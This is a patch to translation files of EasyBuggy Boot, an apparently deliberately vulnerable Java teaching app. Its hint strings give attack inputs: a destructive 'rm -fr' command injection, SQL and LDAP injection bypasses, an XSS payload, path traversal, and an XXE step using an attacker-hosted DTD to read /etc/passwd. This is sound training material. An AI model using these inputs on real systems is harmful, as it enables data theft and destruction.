style.description.nonstyle=\u30b9\u30bf\u30a4\u30eb\u30b7\u30fc\u30c8\u3092\u6307\u5b9a\u3057\u307e\u305b\u3093\u3002 style.name.basic=\u30d9\u30fc\u30b7\u30c3\u30af -style.description.basic=\u30d9\u30fc\u30b7\u30c3\u30af\u306a\u30d8\u30c3\u30c0\u30fc\u3068\u30d5\u30c3\u30bf\u30fc\u304c\u4f7f\u7528\u3055\u308c\u307e\u3059\u3002 +style.name.bootstrap=Bootstrap +style.name.google.mdl=Google Material Design Lite +style.name.materialize=Materialize style.name.monochro=\u30e2\u30ce\u30af\u30ed\u30fc\u30e0 -style.description.monochro=\u30e2\u30ce\u30af\u30ed\u306e\u30d8\u30c3\u30c0\u30fc\u3068\u30d5\u30c3\u30bf\u30fc\u304c\u4f7f\u7528\u3055\u308c\u307e\u3059\u3002 style.name.noframe=\u30d5\u30ec\u30fc\u30e0\u306a\u3057 -style.description.noframe=\u30d8\u30c3\u30c0\u30fc\u3068\u30d5\u30c3\u30bf\u30fc\u306f\u4f7f\u7528\u3055\u308c\u307e\u305b\u3093\u3002 -title.filedescriptorleak.page=\u30a2\u30af\u30bb\u30b9\u5c65\u6b74 +style.name.nonstyle=\u30b9\u30bf\u30a4\u30eb\u30b7\u30fc\u30c8\u672a\u6307\u5b9a + title.adminmain.page=\u7ba1\u7406\u8005\u5411\u3051\u30e1\u30a4\u30f3\u30da\u30fc\u30b8 +title.clickjacking.page=\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9\u5909\u66f4 +title.clientinfo.page=\u30af\u30e9\u30a4\u30a2\u30f3\u30c8\u60c5\u5831 +title.codeinjection.page=JSON\u306e\u89e3\u6790 +title.commandinjection.page=\u6570\u5024\u51e6\u7406\u306e\u5b9f\u884c +title.createobjects.page=\u81ea\u7136\u6570\u306e\u7dcf\u548c +title.csrf.page=\u30d1\u30b9\u30ef\u30fc\u30c9\u5909\u66f4 title.current.date=\u73fe\u5728\u65e5\u4ed8\u306e\u8868\u793a -title.threadleak.page=\u73fe\u5728\u306e\u30b9\u30ec\u30c3\u30c9\u6570\u306e\u8868\u793a title.current.time=\u73fe\u5728\u6642\u523b\u306e\u8868\u793a +title.dbconnectionleak.page=\u30e6\u30fc\u30b6\u30fc\u4e00\u89a7 title.deadlock.page=\u30c7\u30c3\u30c9\u30ed\u30c3\u30af\u306e\u691c\u77e5 +title.design.test.page=\u30c7\u30b6\u30a4\u30f3\u30c6\u30b9\u30c8 title.endlesswaiting.page=\u30d0\u30c3\u30c1\u306e\u5b9f\u884c -title.nullbyteinjection.page=\u30ac\u30a4\u30c9\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9 -title.index.page=EasyBuggy Boot +title.filedescriptorleak.page=\u30a2\u30af\u30bb\u30b9\u5c65\u6b74 +title.index.page=EasyBuggy Bootlin title.intoverflow.page=\u6708\u307e\u3067\u306e\u8ddd\u96e2 title.login.page=\u7ba1\u7406\u8005\u30ed\u30b0\u30a4\u30f3\u30da\u30fc\u30b8 title.lossoftrailingdigits.page=\u5c0f\u6570\u306e\u8db3\u3057\u7b97 title.mailheaderinjection.page=\u7ba1\u7406\u8005\u3078\u306e\u554f\u3044\u5408\u308f\u305b title.memoryleak.page=\u30d2\u30fc\u30d7\u30e1\u30e2\u30ea\u306e\u4f7f\u7528\u91cf title.memoryleak2.page=\u975e\u30d2\u30fc\u30d7\u30e1\u30e2\u30ea\u306e\u4f7f\u7528\u91cf +title.memoryleak3.page=\u30bf\u30a4\u30e0\u30be\u30fc\u30f3\u60c5\u5831 +title.memoryleak3.page.list=\u30bf\u30a4\u30e0\u30be\u30fc\u30f3\u306e\u4e00\u89a7 title.mojibake.page=\u6587\u5b57\u5217\u306e\u5148\u982d\u5927\u6587\u5b57\u5316 -title.commandinjection.page=\u6570\u5024\u51e6\u7406\u306e\u5b9f\u884c -title.codeinjection.page=JSON\u306e\u89e3\u6790 title.netsocketleak.page=\u5fdc\u7b54\u6642\u9593\u306e\u6e2c\u5b9a -title.strplusopr.page=\u30e9\u30f3\u30c0\u30e0\u306a\u6587\u5b57\u5217\u3092\u751f\u6210 +title.nullbyteinjection.page=\u30ac\u30a4\u30c9\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9 title.roundofferror.page=\u7c21\u5358\u306a\u5f15\u304d\u7b97 +title.serverinfo.page=\u30b5\u30fc\u30d0\u30fc\u60c5\u5831 title.slowregex.page=\u6b63\u898f\u8868\u73fe\u306e\u30c6\u30b9\u30c8 title.sqlijc.page=\u6697\u8a3c\u756a\u53f7\u691c\u7d22 -title.createobjects.page=\u81ea\u7136\u6570\u306e\u7dcf\u548c -title.memoryleak3.page=\u30bf\u30a4\u30e0\u30be\u30fc\u30f3\u60c5\u5831 -title.memoryleak3.page.list=\u30bf\u30a4\u30e0\u30be\u30fc\u30f3\u306e\u4e00\u89a7 +title.strplusopr.page=\u30e9\u30f3\u30c0\u30e0\u306a\u6587\u5b57\u5217\u3092\u751f\u6210 +title.threadleak.page=\u73fe\u5728\u306e\u30b9\u30ec\u30c3\u30c9\u6570\u306e\u8868\u793a title.truncationerror.page=\u5c0f\u6570\u306e\u5272\u308a\u7b97 title.unrestrictedextupload.page=\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u306e\u30b0\u30ec\u30fc\u30b9\u30b1\u30fc\u30eb\u5909\u63db title.unrestrictedsizeupload.page=\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u306e\u8272\u53cd\u8ee2 -title.dbconnectionleak.page=\u30e6\u30fc\u30b6\u30fc\u4e00\u89a7 -title.xss.page=\u6587\u5b57\u5217\u306e\u9006\u8ee2 title.xee.page=\u30e6\u30fc\u30b6\u30fc\u306e\u4e00\u62ec\u767b\u9332 +title.xss.page=\u6587\u5b57\u5217\u306e\u9006\u8ee2 title.xxe.page=\u30e6\u30fc\u30b6\u30fc\u306e\u4e00\u62ec\u66f4\u65b0 From 797f840b22d4d19ad7b2f3ba8d43192908afbdfa Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Tue, 24 Oct 2017 21:52:37 +0900 Subject: [PATCH 033/139] New translations messages.properties (Korean) --- src/main/resources/messages_ko.properties | 355 ++++++++++------------ 1 file changed, 165 insertions(+), 190 deletions(-) diff --git a/src/main/resources/messages_ko.properties b/src/main/resources/messages_ko.properties index d02e954..5b6babb 100644 --- a/src/main/resources/messages_ko.properties +++ b/src/main/resources/messages_ko.properties @@ -1,148 +1,122 @@ #X-Generator: crowdin.com -description.all=Warning\: Several links cause severe memory leaks or increase a CPU usage rate. They can make your computer unstable.\nThe result may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. - -section.troubles=Troubles +description.access.history=Access history in this page (The latest 15 records). +description.all=Warning\: Several links cause severe memory leaks or increase a CPU usage rate. They can make your computer unstable.The result may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. +description.capitalize.string=If you enter a string, then the capitalized string is shown. For example\: capitalize string -> Capitalize String +description.design.page=You can change design of this page. Please click one of the links below and change this page to your style. +description.design.test=Please click on one of the links below. +description.endless.waiting=If you enter a character count, then a batch (including echo characters of the count) is created and executed. +description.errors=OutOfMemoryError, StackOverflowError, NoClassDefFoundError, and so on\: +description.parse.json=If you enter a JSON string, then a result checked by JSON.parse() of JavaScript is shown. +description.performance.issue=Issues for performance +description.random.string.generator=If you enter a character count, then a random characters of the count is created. +description.response.time=If you add pingurl\=[a URL] to query string, the response code and time from the url is shown. +description.reverse.string=If you enter a string, then the reversed string is shown. +description.section.exceptions=Exceptions, extending from java.lang.RuntimeException\: +description.send.mail=You can send a mail to the site administrator. +description.test.regular.expression=Please test if an input string matches the regular expression ^([a-z0-9]+[-]{0,1}){1,100}$. description.troubles=Memory leak, infinite loop, deadlock, and so on\: +description.vulnerabilities=XSS, SQL Injection, LDAP injection, and so on\: -function.name.memory.leak=Memory Leak (Java heap space) -function.description.memory.leak=Memory leak occurs in Java heap space every time you load this page. -function.name.memory.leak2=Memory Leak ({0}) -function.description.memory.leak2=Memory leak occurs in {0} every time you load this page. -function.name.memory.leak3=Memory Leak (C heap space) -function.description.memory.leak3=Memory leak occurs in C heap space every time you load this page. -function.name.infinite.loop=Infinite Loop -function.description.infinite.loop=Infinite loop occurs if you click this link. -function.name.dead.lock=Deadlock (Java) +function.description.brute.force=This login page is vulnerable for brute-force attack because it does not have an account lock mechanism. +function.description.clickjacking=There is a clickjacking vulnerability in the change mail address page. +function.description.code.injection=There is a code injection vulnerability in this page. +function.description.csrf=There is a CSRF vulnerability in the change password page. +function.description.dangerous.file.inclusion=An external dangerous file can be included in this page. +function.description.database.connection.leak=Database connection leak occurs every time you load the page. function.description.dead.lock=Deadlock (Java) can occur. -function.name.dead.lock2=Deadlock (SQL) function.description.dead.lock2=Deadlock (SQL) can occur. -function.name.endless.waiting.process=Endless Waiting Process +function.description.ei.error=ExceptionInInitializerError is thrown at first, and NoClassDefFoundError is thrown from the second if you click this link. function.description.endless.waiting.process=Endless waiting process can occur. -function.name.jvm.crash.eav=JVM Crash -function.description.jvm.crash.eav=JVM crashes if you click this link. -function.name.redirect.loop=Redirect Loop -function.description.redirect.loop=Redirect loop occurs if you click this link. -function.name.forward.loop=Forward Loop -function.description.forward.loop=Forward loop occurs if you click this link. -function.name.network.socket.leak=Network Socket Leak -function.description.network.socket.leak=Network socket leak occurs every time you load this page. -function.name.database.connection.leak=Database Connection Leak -function.description.database.connection.leak=Database connection leak occurs every time you load the page. -function.name.file.descriptor.leak=File Descriptor Leak function.description.file.descriptor.leak=File descriptor leak occurs every time you load this page. -function.name.thread.leak=Thread Leak -function.description.thread.leak=Thread leak occurs every time you load this page. -function.name.mojibake=Mojibake -function.description.mojibake=Mojibake can occur. -function.name.int.overflow=Integer Overflow +function.description.forward.loop=Forward loop occurs if you click this link. +function.description.infinite.loop=Infinite loop occurs if you click this link. function.description.int.overflow=Integer overflow can occur. -function.name.round.off.error=Round Off Error -function.description.round.off.error=Round off error can occur. -function.name.truncation.error=Truncation Error -function.description.truncation.error=Truncation error can occur. -function.name.cancellation.of.significant.digits=Cancellation of Significant Digits -function.description.cancellation.of.significant.digits=Cancellation of significant digits can occur. -function.name.loss.of.trailing.digits=Loss of Trailing Digits +function.description.jvm.crash.eav=JVM crashes if you click this link. +function.description.ldap.injection=There is an LDAP injection vulnerability in this page. function.description.loss.of.trailing.digits=Loss of trailing digits can occur. - - -section.performance.issue=Performance Issue -description.performance.issue=Issues for performance - -function.name.slow.regular.expression=Delay due to regular expression parse +function.description.mail.header.injection=There is a mail header injection vulnerability in this page. +function.description.memory.leak=Memory leak occurs in Java heap space every time you load this page. +function.description.memory.leak2=Memory leak occurs in {0} every time you load this page. +function.description.memory.leak3=Memory leak occurs in C heap space every time you load this page. +function.description.mojibake=Mojibake can occur. +function.description.network.socket.leak=Network socket leak occurs every time you load this page. +function.description.null.byte.injection=There is a null byte injection vulnerability in this page. +function.description.open.redirect=There is an open redirect vulnerability in this login page. +function.description.os.command.injection=There is an OS command injection vulnerability in this page. +function.description.path.traversal=There is a path traversal vulnerability in this page. +function.description.redirect.loop=Redirect loop occurs if you click this link. +function.description.round.off.error=Round off error can occur. +function.description.session.fixation=This login page is vulnerable for session fixation attack. function.description.slow.regular.expression=It takes time to parse the regular expression if you enter a specific string. -function.name.slow.string.plus.operation=Delay of creating string due to +(plus) operator function.description.slow.string.plus.operation=It takes time to append strings if you enter a large number. -function.name.slow.unnecessary.object.creation=Delay due to unnecessary object creation function.description.slow.unnecessary.object.creation=If you input a large number, it takes time to respond due to unnecessary object creation. -function.name.stop.the.world=Stop the World -function.description.stop.the.world=Stop the World occurs if you click this link. - - -section.vulnerabilities=Vulnerabilities -description.vulnerabilities=XSS, SQL Injection, LDAP injection, and so on\: - -function.name.xss=XSS (Cross Site Scripting) -function.description.xss=There is a cross site scripting vulnerability in this page. -function.name.sql.injection=SQL Injection function.description.sql.injection=There is an SQL injection vulnerability in this page. -function.name.ldap.injection=LDAP Injection -function.description.ldap.injection=There is an LDAP injection vulnerability in this page. +function.description.thread.leak=Thread leak occurs every time you load this page. +function.description.throwable={0} is thrown if you click this link. +function.description.truncation.error=Truncation error can occur. +function.description.unintended.file.disclosure=There is an unintended file disclosure vulnerability in this page. +function.description.unrestricted.ext.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. +function.description.unrestricted.size.upload=This page is vulnerable for attacks such as code injection because there are no limitation for uploading file extension. +function.description.verbose.error.message=It is easy to guess an account who can logs in because authentication error messages on this page are too detailed. +function.description.xee=There is an XEE vulnerability in this page. +function.description.xss=There is a cross site scripting vulnerability in this page. +function.description.xxe=There is an XXE vulnerability in this page. +function.name.brute.force=Login page that allows brute-force attacks +function.name.clickjacking=Clickjacking function.name.code.injection=Code Injection -function.description.code.injection=There is a code injection vulnerability in this page. -function.name.os.command.injection=OS Command Injection -function.description.os.command.injection=There is an OS command injection vulnerability in this page. +function.name.csrf=CSRF (Cross-site Request Forgery) +function.name.dangerous.file.inclusion=Dangerous File Inclusion +function.name.database.connection.leak=Database Connection Leak +function.name.dead.lock=Deadlock (Java) +function.name.dead.lock2=Deadlock (SQL) +function.name.endless.waiting.process=Endless Waiting Process +function.name.file.descriptor.leak=File Descriptor Leak +function.name.forward.loop=Forward Loop +function.name.infinite.loop=Infinite Loop +function.name.int.overflow=Integer Overflow +function.name.jvm.crash.eav=JVM Crash +function.name.ldap.injection=LDAP Injection +function.name.loss.of.trailing.digits=Loss of Trailing Digits function.name.mail.header.injection=Mail Header Injection -function.description.mail.header.injection=There is a mail header injection vulnerability in this page. +function.name.memory.leak=Memory Leak (Java heap space) +function.name.memory.leak2=Memory Leak ({0}) +function.name.memory.leak3=Memory Leak (C heap space) +function.name.mojibake=Mojibake +function.name.network.socket.leak=Network Socket Leak function.name.null.byte.injection=Null Byte Injection -function.description.null.byte.injection=There is a null byte injection vulnerability in this page. -function.name.unrestricted.size.upload=Size Unrestricted File Upload -function.description.unrestricted.size.upload=This page is vulnerable for attacks such as code injection because there are no limitation for uploading file extension. -function.name.unrestricted.ext.upload=Extension Unrestricted File Upload -function.description.unrestricted.ext.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. function.name.open.redirect=Login page that allows Open Redirect -function.description.open.redirect=There is an open redirect vulnerability in this login page. -function.name.brute.force=Login page that allows brute-force attacks -function.description.brute.force=This login page is vulnerable for brute-force attack because it does not have an account lock mechanism. -function.name.session.fixation=Login page that allows session fixation attacks -function.description.session.fixation=This login page is vulnerable for session fixation attack. -function.name.verbose.error.message=Verbose Authentication Error Messages -function.description.verbose.error.message=It is easy to guess an account who can logs in because authentication error messages on this page are too detailed. -function.name.dangerous.file.inclusion=Dangerous File Inclusion -function.description.dangerous.file.inclusion=An external dangerous file can be included in this page. +function.name.os.command.injection=OS Command Injection function.name.path.traversal=Path Traversal -function.description.path.traversal=There is a path traversal vulnerability in this page. +function.name.redirect.loop=Redirect Loop +function.name.round.off.error=Round Off Error +function.name.session.fixation=Login page that allows session fixation attacks +function.name.slow.regular.expression=Delay due to regular expression parse +function.name.slow.string.plus.operation=Delay of creating string due to +(plus) operator +function.name.slow.unnecessary.object.creation=Delay due to unnecessary object creation +function.name.sql.injection=SQL Injection +function.name.thread.leak=Thread Leak +function.name.truncation.error=Truncation Error function.name.unintended.file.disclosure=Unintended File Disclosure -function.description.unintended.file.disclosure=There is an unintended file disclosure vulnerability in this page. -function.name.csrf=CSRF (Cross-site Request Forgery) -function.description.csrf=There is a CSRF vulnerability in the change password page. -function.name.clickjacking=Clickjacking -function.description.clickjacking=There is a clickjacking vulnerability in the change mail address page. +function.name.unrestricted.ext.upload=Extension Unrestricted File Upload +function.name.unrestricted.size.upload=Size Unrestricted File Upload +function.name.verbose.error.message=Verbose Authentication Error Messages function.name.xee=XEE (XML Entity Expansion) -function.description.xee=There is an XEE vulnerability in this page. +function.name.xss=XSS (Cross Site Scripting) function.name.xxe=XXE (XML External Entity) -function.description.xxe=There is an XXE vulnerability in this page. - - -section.errors=Errors -description.errors=OutOfMemoryError, StackOverflowError, NoClassDefFoundError, and so on\: - -function.description.ei.error=ExceptionInInitializerError is thrown at first, and NoClassDefFoundError is thrown from the second if you click this link. - - -section.exceptions=Unchecked Exception -description.section.exceptions=Exceptions, extending from java.lang.RuntimeException\: -function.description.throwable={0} is thrown if you click this link. - - - -description.access.history=Access history in this page (The latest 15 records). -description.capitalize.string=If you enter a string, then the capitalized string is shown. For example\: capitalize string -> Capitalize String -description.design.page=You can change design of this page. Please click one of the links below and change \nthis page to your style. -description.design.test=Please click on one of the links below. -description.endless.waiting=If you enter a character count, then a batch (including echo characters of the count) is created and executed. -description.parse.json=If you enter a JSON string, then a result checked by JSON.parse() of JavaScript is shown. -description.random.string.generator=If you enter a character count, then a random characters of the count is created. -description.response.time=If you add pingurl\=[a URL] to query string, the response code and time from the url is shown. -description.reverse.string=If you enter a string, then the reversed string is shown. -description.test.regular.expression=Please test if an input string matches the regular expression ^([a-z0-9]+[-]{0,1}){1,100}$. -description.send.mail=You can send a mail to the site administrator. label.access.time=Access Time -label.available.characters=Available Characters label.attach.file=Attach File +label.available.characters=Available Characters label.browser=Browser label.calculate=Calculate label.capitalized.string=Capitalized String label.character.count=Character Count label.code=Code label.content=Content -label.current.date=Current Date label.current.thread.count=Current Thread Count -label.current.time=Current Time label.execution.result=Execution Result\: -label.goto.admin.page=Go to admin main page label.go.to.main=Go to main page +label.goto.admin.page=Go to admin main page label.history.back=Back label.ip.address=IP Address label.json.string=JSON String @@ -153,22 +127,22 @@ label.login.user.id=Login User ID label.logout=Log out label.lowercase.characters=Lowercase Characters label.mail=Mail Address -label.memory.init=Init Value -label.memory.used=Used Init Value +label.memory.collection.usage=Collection Usage label.memory.committed=Committed Init Value +label.memory.init=Init Value label.memory.max=Max Init Value -label.memory.usage=Memory Usage label.memory.peak.usage=Peak Memory Usage -label.memory.collection.usage=Collection Usage +label.memory.usage=Memory Usage +label.memory.used=Used Init Value label.metaspace=Metaspace -label.permgen.space=PermGen space -label.platform=Platform label.name=Name label.numbers=Numbers label.obelus=/ label.password=Password +label.permgen.space=PermGen space label.phone=Phone label.ping.url=Ping URL +label.platform=Platform label.response.code=Response Code label.response.time=Response Time label.reversed.string=Reversed String @@ -179,14 +153,9 @@ label.string=String label.subject=Subject label.submit=Submit label.times=times -label.timezone.dst.savings=Amount of DST -label.timezone.has.same.rules=Same Rule as Default label.timezone.id=Time Zome ID -label.timezone.in.daylight.time=Being in DST label.timezone.name=Time Zome Name label.timezone.offset=Time Zome Offset -label.timezone.raw.offset=Amount of Raw Offset Time -label.timezone.use.daylight.time=Useing DST label.update=Update label.upload=Upload label.uppercase.characters=Uppercase Characters @@ -194,8 +163,9 @@ label.user.agent=User Agent label.user.id=User ID label.value=Value label.version=Version -label.your.name=Your Name label.your.mail=Your Mail Address +label.your.name=Your Name + msg.account.locked=Your account is locked out because the number of login failures exceeds 10 times. msg.add.users.by.xml=If you upload an XML file of the following format, users can be registered all at once. msg.admin.page.top=Well come to admins page\!\! @@ -205,7 +175,6 @@ msg.batch.registration.complete=Batch registration of users has completed. msg.batch.registration.fail=Batch registration of users fails. msg.batch.update.complete=Batch update of users has completed. msg.batch.update.fail=Batch update of users fails. -msg.note.memoryleak3=Memory leak occurs in C heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. msg.calc.sym.natural.numbers=This page can calculate the sum of all natural numbers (1 + 2 + 3 + ... + n) less than or equal to n. msg.cant.create.batch=Can't create a batch file. msg.convert.grayscale=You can convert the color of an image file into gray scale. @@ -216,140 +185,146 @@ msg.dead.lock.detected=Deadlock is detected. msg.dead.lock.not.occur=Deadlock has not occurred yet. msg.deadlock.occurs=A lock could not be obtained due to a deadlock. msg.download.file=You can download the following PDF files. +msg.enter.decimal.value=Please enter the absolute value of a decimal number less than 1. msg.enter.json.string=Please enter JSON string. msg.enter.mail=Please enter your mail address. msg.enter.math.expression=Please enter a mathematical expression. You can use java.lang.Math in the expression. For example, Math.sqrt(Math.pow(2, 6)) - 5 -msg.enter.name.and.passwd=If you enter your name and password, then your secret number is shown. msg.enter.name=Please enter your name. +msg.enter.name.and.passwd=If you enter your name and password, then your secret number is shown. msg.enter.passwd=If you enter a new password and click the submit button, then your password will be changed. msg.enter.positive.number=Please enter a positive number. -msg.enter.decimal.value=Please enter the absolute value of a decimal number less than 1. -msg.enter.id.and.password=Please enter your user ID and password. msg.enter.string=Please enter a string. msg.error.user.not.exist=User does not exist or password does not match. msg.executed.batch=Created and executed the batch\: -msg.note.filedescriptorleak=File descriptor leak occurs every time you load this page. -msg.info.jvm.not.crash=JVM crash only occurs if using Oracle JDK 6 or 7. msg.invalid.expression=Invalid expression \: {0} msg.invalid.json=Invalid JSON \: {0} -msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. msg.low.alphnum8=Password is 8 lowercase alphanumeric characters. -msg.need.admin.privilege=You need admin privileges to go ahead from here. -msg.note.brute.force=You can login with admin and password. \nThe number of login attempts is not limited on this page, so the brute force attack is possible. +msg.mail.change.failed=Mail address change failed. +msg.mail.changed=Your mail address is successfully changed. +msg.mail.format.is.invalid=The mail address is an invalid format. +msg.mail.is.empty=Please enter subject and content. +msg.match.regular.expression=The input string matches the regular expression. +msg.max.file.size.exceed=The file size exceeds the allowable limit. +msg.not.image.file=The chosen file is not an image file. +msg.not.match.regular.expression=The input string does not match the regular expression. +msg.not.xml.file=The chosen file is not an XML file. +msg.note.brute.force=You can login with admin and password. The number of login attempts is not limited on this page, so the brute force attack is possible. msg.note.clickjacking=This page receives a request that a user does not intend and changes the user's mail address. +msg.note.clientinfo=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. If you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. msg.note.codeinjection=If you enter {}');java.lang.System.exit(0);// , then JavaVM is forcibly finished due to code injection. +msg.note.commandinjection=If you enter @Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. +msg.note.createobjects=If you enter a large number, it takes time to respond due to unnecessary object creation. msg.note.csrf=This page receives a request that a user does not intend and changes the user's password. msg.note.dangerous.file.inclusion=Change the query string to template\=[URL where malicious JSP file is deployed], then a malicious code is executed. msg.note.db.connection.leak.occur=DB connection leak occurs every time you load this page. msg.note.deadlock=Deadlock occurs after continuously loading this page few times. +msg.note.deadlock2=If you open two windows (or tabs) and sort in the ascending order of user ID and click the "update" button on one window immediately after you sort in the descending order and click the "update" button on the other, then deadlock occurs in database. msg.note.endlesswaiting=If you enter a large number, then an endless waiting process occurs. -msg.note.createobjects=If you enter a large number, it takes time to respond due to unnecessary object creation. -msg.note.roundofferror=Round off error occurs if you enter 1. -msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. -msg.note.lossoftrailingdigits=Loss of trailing digits occurs if you enter 0.0000000000000001. -msg.note.commandinjection=If you enter @Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. -msg.note.not.use.ext.db=Database connection leak occurs if using an external RDBMS such as MySQL. Please edit application.properties if using an external RDBMS. -msg.note.path.traversal=Change the query string to template\=../uid/adminpassword.txt?, then you can see the content of adminpassword.txt in this page. +msg.note.filedescriptorleak=File descriptor leak occurs every time you load this page. msg.note.intoverflow=Integer overflow occurs if you enter a number greater than or equal to 63. -msg.note.session.fixation=You can login with admin and password. \nThe URL rewriting feature works on this page in order to support clients that cannot use cookie, so the session fixation attack is possible. -msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
\n If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. -msg.note.strplusopr=If you enter a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator. -msg.note.deadlock2=If you open two windows (or tabs) and sort in the ascending order of user ID and click the "update" button on one window immediately after you \nsort in the descending order and click the "update" button on the other, then deadlock occurs in database. -msg.note.sqlijc=You can see a secret number if you enter Mark and password. \nYou can see other users information if you enter password to ' OR '1'\='1 -msg.note.ldap.injection=You can login with admin and password. \nYou can bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). +msg.note.ldap.injection=You can login with admin and password. You can bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). +msg.note.lossoftrailingdigits=Loss of trailing digits occurs if you enter 0.0000000000000001. msg.note.mailheaderinjection=If you change the input tag of the subject field to a textarea tag by browser's developer mode and set it to [subject][line break]Bcc\: [a mail address], then you can send a mail to the address. +msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. +msg.note.memoryleak3=Memory leak occurs in C heap space every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. msg.note.mojibake=Mojibake occurs if you enter a multi-byte string. -msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml. -msg.note.open.redirect=You can login with admin and password. \nIf you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. msg.note.netsocketleak=Network socket leak occurs every time you load this page. -msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, \nthen JavaVM is forcibly finished. -msg.note.clientinfo=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. +msg.note.not.use.ext.db=Database connection leak occurs if using an external RDBMS such as MySQL. Please edit application.properties if using an external RDBMS. +msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml. +msg.note.open.redirect=You can login with admin and password. If you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. +msg.note.path.traversal=Change the query string to template\=../uid/adminpassword.txt?, then you can see the content of adminpassword.txt in this page. +msg.note.roundofferror=Round off error occurs if you enter 1. +msg.note.session.fixation=You can login with admin and password. The URL rewriting feature works on this page in order to support clients that cannot use cookie, so the session fixation attack is possible. +msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
 If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. +msg.note.sqlijc=You can see a secret number if you enter Mark and password. You can see other users information if you enter password to ' OR '1'\='1 +msg.note.strplusopr=If you enter a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator. +msg.note.threadleak=Thread leak occurs every time you load this page. +msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. +msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. -msg.note.verbose.errror.message=You can login with admin and password. \nIt is easy to guess an account who can logs in since authentication error messages on this page is too detailed. +msg.note.verbose.errror.message=You can login with admin and password. It is easy to guess an account who can logs in since authentication error messages on this page is too detailed. msg.note.xee=If you upload the following XML file, it will waste server resources. msg.note.xss=Session ID is shown if you enter name to >tpircs/<;)eikooc.tnemucod(trela>tpIrcs< msg.note.xxe.step1=If you create the following DTD file on a web server that can be accessed from this server, for example, http\://attacker.site/vulnerable.dtd msg.note.xxe.step2=and upload the following XML file, you can display the password file (/etc/passwd) on the Linux server. -msg.not.image.file=The chosen file is not an image file. -msg.not.match.regular.expression=The input string does not match the regular expression. -msg.not.xml.file=The chosen file is not an XML file. -msg.mail.changed=Your mail address is successfully changed. -msg.mail.change.failed=Mail address change failed. -msg.mail.format.is.invalid=The mail address is an invalid format. -msg.mail.is.empty=Please enter subject and content. -msg.match.regular.expression=The input string matches the regular expression. -msg.max.file.size.exceed=The file size exceeds the allowable limit. -msg.passwd.changed=Your password is successfully changed. msg.passwd.change.failed=Password change failed. +msg.passwd.changed=Your password is successfully changed. msg.passwd.is.too.short=The password must be at least 8 characters. msg.password.not.match=The password does not match. -msg.permgen.space.leak.occur=Memory leak occurs in {0} every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. +msg.permgen.space.leak.occur=Memory leak occurs in {0} every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. msg.question.reach.the.moon=How many times would you have to fold a piece of paper (thickness 0.1mm) for it to be thick enough to reach the moon (384,400 km)? msg.reverse.color=You can reverse the color of an image file. msg.reverse.color.complete=The color reversal of the image file has completed. msg.reverse.color.fail=The color reversal of the image file fails. +msg.select.upload.file=Select a file to upload. msg.sent.mail=The mail was sent successfully. msg.smtp.server.not.setup=Mail properties are not correctly set in application.properties. msg.unknown.exception.occur=Unknown exception occurs \: {0} msg.update.records=Updated {0} records. -msg.update.users.by.xml=If you upload an XML file of the following format, users can be updated all at once. msg.update.users=You can update users information. -msg.select.upload.file=Select a file to upload. -msg.note.threadleak=Thread leak occurs every time you load this page. -msg.user.not.exist=The user does not exist. +msg.update.users.by.xml=If you upload an XML file of the following format, users can be updated all at once. msg.user.already.exist=The user already exists. +msg.user.not.exist=The user does not exist. msg.valid.json=Valid JSON\! msg.warn.enter.name.and.passwd=Please enter your name and password. -title.clickjacking.page=Change Your Mail -title.csrf.page=Change Your Password -title.clientinfo.page=Client Information -title.design.test.page=Design Test -title.serverinfo.page=Server 